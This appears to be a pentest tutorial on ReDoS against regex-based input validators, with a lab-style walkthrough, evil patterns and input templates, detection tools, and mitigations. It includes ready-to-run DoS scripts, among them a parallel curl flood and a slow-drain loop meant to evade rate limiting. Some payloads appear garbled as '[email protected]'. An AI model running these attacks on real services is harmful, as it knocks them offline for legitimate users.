ReDoS

TL;DR

Some regex patterns trigger catastrophic backtracking on inputs that almost-but-don’t-quite match. A 50-character crafted string can lock a regex engine for seconds, minutes, or forever - denial of service from a single HTTP request. APIs that validate input via regex (email validators, URL validators, format checkers) are the primary surface.

# 1. Identify a regex-validated parameter (response leaks the pattern, error mentions regex,
#    or it's a documented format check like email/URL/phone)
curl 'http://target/api/check-email?email=test_value'
→ {"regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", ...}

# 2. Look for evil patterns - nested quantifiers, overlapping alternation
#    ([a-z]+)+  ← classic
#    (a|a)+     ← alternation with overlap
#    (a*)*      ← nested *
#    (.*)*$     ← greedy-everything anchored

# 3. Craft an input that triggers backtracking - usually:
#    "string-that-almost-matches" + "character-that-breaks-the-match"
curl 'http://target/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjj@cccccccccccccccc.55555555555555.'

# 4. Observe response time - multi-second hangs indicate ReDoS
time curl '...?email=jjjjjjjj...'        # baseline
time curl '[email protected].'   # crafted (slow)

Success indicator: response time scales superlinearly with input length - short inputs respond in milliseconds, slightly-longer inputs respond in seconds, slightly-longer-still inputs respond in minutes.

Why ReDoS exists

Most regex engines (Perl-compatible, including PHP PCRE, Python re, JavaScript V8, .NET, Ruby) use backtracking to handle ambiguous patterns. When a regex has alternatives or quantifiers, the engine tries one path, and if it doesn’t match, backs up and tries another. For simple patterns this is fast. For patterns with overlapping options, the backtracking can take exponential time.

The “evil regex” class is patterns where the engine has many ways to partially match a string but the full match fails - every partial match has to be tried before the engine concludes “no match.”

A minimal evil regex

^(a+)+$

Try matching aaaaaaaab (8 a’s followed by a b):

Engine tries (aaaaaaaa)+ → tries to match $ against b → fails
Backtracks: tries (aaaaaaa)(a)+ → tries to match $ against b → fails
Backtracks: tries (aaaaaa)(a)(a)+ → tries to match $ against b → fails
…

For 8 a’s, the engine tries 2⁷ = 128 backtracking paths. For 30 a’s, 2²⁹ ≈ 500 million paths. Each path takes microseconds; cumulatively, seconds-to-minutes.

The trigger: an input where the regex almost matches, requiring full exploration of the backtracking tree before concluding “no match.”

Patterns that are vulnerable

The patterns to spot in source review or leaked-regex responses:

Nested quantifiers

([a-z]+)+
(\d+)*
(.*)*

Anything where a quantified group (+, *, {n,m}) wraps an already-quantified pattern. Each level multiplies the backtracking complexity.

Alternation with overlap

(a|a)*
(ab|a)*b
(x+x+)+y

When an OR alternative can match the same prefix as another, the engine considers all combinations.

Group with greedy quantifier followed by anchor

^(\d+)$           # safe - \d is unambiguous
^(.+)*$           # vulnerable - .+ matches anything, * adds another level

The infamous email regex

The HTB-style example:

^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$

Walking through what makes it vulnerable:

Section	Vulnerability
`([a-zA-Z0-9_.-])+`	OK - character class with single `+`
`(([a-zA-Z0-9-])+.)+`	Nested `+` - `[...]+` inside `(...)+`. Each domain segment can match in multiple ways.
`([a-zA-Z0-9]{2,4})+`	Quantifier inside quantifier - TLD can be 2-4 chars, group is repeated.

Multiple compounding issues. An attacker-crafted input forces exponential exploration.

Detection

When the regex is exposed

Some APIs leak their regex in error responses or schema documents:

GET /api/check-email?email=test_value HTTP/1.1

{
  "regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/",
  "success": false
}

Free win - paste the regex into a vulnerability checker:

regex101.com - explains structure, flags ambiguities
regulex (jex.im) - visualizes the state machine
recheck - automated ReDoS scanner
safe-regex - Node.js library that flags evil patterns

When the regex is hidden

For black-box detection, the workflow is:

Identify a format-validated parameter - email, URL, phone, ZIP, IP address. Any parameter where invalid input gets rejected with a “format” error.

Send a baseline valid input and time the response:

$ time curl 'http://target/api/[email protected]'
real    0m0.012s

Send increasingly long crafted inputs and watch for nonlinear response time growth:

$ for length in 10 20 30 40 50 60 70; do
    payload=$(python3 -c "print('j'*$length + '@' + 'c'*$length + '.55555.')")
    echo -n "Length $length: "
    time curl -s "http://target/api/check-email?email=$payload" > /dev/null
done

Length 10: real    0m0.013s
Length 20: real    0m0.019s
Length 30: real    0m0.142s
Length 40: real    0m2.341s
Length 50: real    0m38.21s
Length 60: (timeout)

Exponential growth in response time confirms catastrophic backtracking.

Generic evil-input templates

Without knowing the exact regex, these inputs catch common patterns:

Target format	Evil input template
Email	`[email protected].` (note trailing dot)
URL	`http://aaaa...aaa.com/aaa...aaa/!` (trailing special char)
IPv4	`0.0.0.0.0.0.0.0.0...` (extra octets)
Phone	`1234567890123456789X` (overlong + invalid char)
HTML tag	`<a href="aaa...aaa">` (long attribute value)
Filename	`aaa...aaa.aaa.aaa.aaa.zip` (multi-dot)
ISO date	`2023-01-01T12:34:567890123` (overlong time)

The pattern: long valid-looking prefix + character that breaks the final anchor.

Exploitation

Single-request DoS

$ curl --max-time 60 "http://target/api/check-email?email=$(python3 -c "print('j'*30 + '@' + 'c'*30 + '.5'*30 + '.')")"

While the request is processing, the worker thread is locked. If the server has limited workers (e.g., uWSGI with 4 workers, PHP-FPM with 5 children), 5 concurrent crafted requests lock all workers - service unavailable to legitimate users.

Amplified DoS

#!/bin/bash
# Fire N parallel requests, each locking one worker
for i in $(seq 1 100); do
    curl --max-time 120 "http://target/api/check-email?email=$EVIL_INPUT" &
done
wait

Net effect: 100 worker-minutes consumed per second of attack. Service capacity is exhausted long before bandwidth is.

Stealthier DoS via slow drain

Instead of obvious flood, drip-feed crafted inputs at a rate just slow enough to evade rate limiters:

while true; do
    curl --max-time 60 "http://target/api/check-email?email=$EVIL_INPUT"
    sleep 5
done

Each request occupies one worker for ~30-60 seconds. Six workers locked at any time. Service is “available” by uptime metrics but practically unusable. Detection requires the defender to notice worker pool saturation, which is a thinner signal than request flood.

The HTB-style worked walkthrough

Walking through the source-doc scenario:

Step 1 - Identify the surface

$ curl 'http://target:3000/api/check-email?email=test_value'
{"regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", "success": false}

The endpoint validates an email. Crucially, the response leaks the regex - no source-code access needed.

Step 2 - Analyze the regex

Submit to regex101.com for explanation, or visualize at regulex. The visualization shows the nested quantifiers and overlapping character classes.

Step 3 - Craft the evil input

The pattern needs an input that:

Starts with characters matching the first capture group ([a-zA-Z0-9_.-]+)
Contains an @
Has multiple “domain segments” (each matching [a-zA-Z0-9-]+.)
Ends with characters that almost-but-don’t-quite match the TLD class

jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555.

Multiple long groups of j/c/5, terminated with a trailing . that the TLD class can’t accept (because 5555...5. ends with . not an alphanumeric).

Step 4 - Confirm

$ time curl "http://target:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555."

# (waits 30+ seconds)

{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", "success":false}

real    0m38.42s

The 38-second response time vs. the millisecond baseline confirms ReDoS.

Step 5 - Scale to DoS

Five workers, each blocked for 30 seconds = 25 seconds of unavailability per attack cycle:

for i in {1..10}; do
    curl --max-time 60 "http://target:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555." &
done
wait

Tools

Vulnerability scanners

# Node-based: scan a regex string for catastrophic backtracking risk
$ npm install -g safe-regex
$ echo '/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/' | safe-regex
False
# (False means unsafe)

# Static analyzer for code containing regexes
$ npx eslint --rule 'security/detect-unsafe-regex: error' source.js

# Comprehensive scanner (Java, C#, JS, Python, etc.)
$ recheck check 'pattern_here'

Burp extensions

Burp Pro’s “Active Scanner” detects ReDoS in some patterns. Community extensions:

ReDoSinator - focused ReDoS testing
Backslash Powered Scanner - detects various injection-like behaviors including timing-based regex issues

Curated wordlists

Wikipedia ReDoS and OWASP ReDoS Cheat Sheet list known evil patterns and their canonical evil inputs. Test these against any format-validated parameter:

Pattern	Evil input
`^(a+)+$`	`aaaa...aaab`
`(a)$`	`aaaa...aaab`
`^(a\|a)+$`	`aaaa...aaab`
`(a\|aa)+$`	`aaaa...aaab`
`^([a-zA-Z]+)*$`	`XaXaXa...XaXa1`
`(\.\?)`	`..........!`
The email regex above	`[email protected].`

Defensive considerations

When reporting ReDoS, the remediation tells you which targets to skip:

Mitigation	Effect on attacker
Use a non-backtracking regex engine (Rust `regex`, Go `regexp`, RE2)	Eliminates the class entirely
Add regex timeout (`re2.compile(pattern, timeout=100ms)` equivalents)	Limits damage; attacker can still trigger 100ms-per-request waste
Replace regex with custom parsing	Eliminates the regex-specific vector
Input length limits	Bounds the worst case
WAF rules for “long input + format mismatch”	Partial - can be evaded

Servers using RE2 (Google’s regex library) or Rust’s regex crate are immune to ReDoS by design - these engines guarantee linear-time evaluation. JS V8’s regex is not RE2; neither is Python’s re. PCRE (PHP, Apache rules) is not RE2 either.

Limitations and ethics

Production-scale ReDoS attacks are denial-of-service attacks. Engagement scope and authorization matter:

In-scope DoS testing - proceed but document carefully; coordinate with the SRE team to avoid impacting other customers
Bug bounty programs - DoS testing usually explicitly out of scope; report the vulnerability (the pattern) without triggering large-scale impact
Pentesting - confirm one slow request (proves the vulnerability) without scaling to actual service disruption

The proof-of-concept is one crafted-input response time. Anything beyond that risks causing damage that the engagement may not authorize.

Quick reference

Task	Pattern
Spot regex disclosure in API response	Field literally named `regex`, or pattern characters in error string
Visualize a regex	regex101.com, regulex (jex.im)
Scan a regex for ReDoS risk	`safe-regex`, `recheck`
Evil patterns to look for	`(x+)+`, `(x\|x)+`, `(x)`, `(.+)`, nested groups with `+`/``
Evil input pattern	Long valid-prefix + breaking-character at the end
Baseline timing	`time curl 'URL?param=normal_value'`
Crafted timing	`time curl 'URL?param=EVIL_INPUT'`
Scaling for DoS confirmation	Loop with increasing length, watch nonlinear time growth
Single-request DoS	One crafted request, observe worker hangs
Amplified DoS	N parallel crafted requests, saturate worker pool
Stealthier DoS	Drip-feed slow but constant rate
Backtracking-immune engines	RE2 (Go regexp, Rust regex), Hyperscan
Backtracking-vulnerable engines	PCRE (PHP), V8 (JS), `re` (Python), `regex` (Ruby), .NET, Java `Pattern`

For the API-specific context this attack lives in, see the Overview and API vuln context. For the capstone chain combining SOAPAction spoofing + SQL injection, see Skill assessment chain.

Defenses D3-RAPA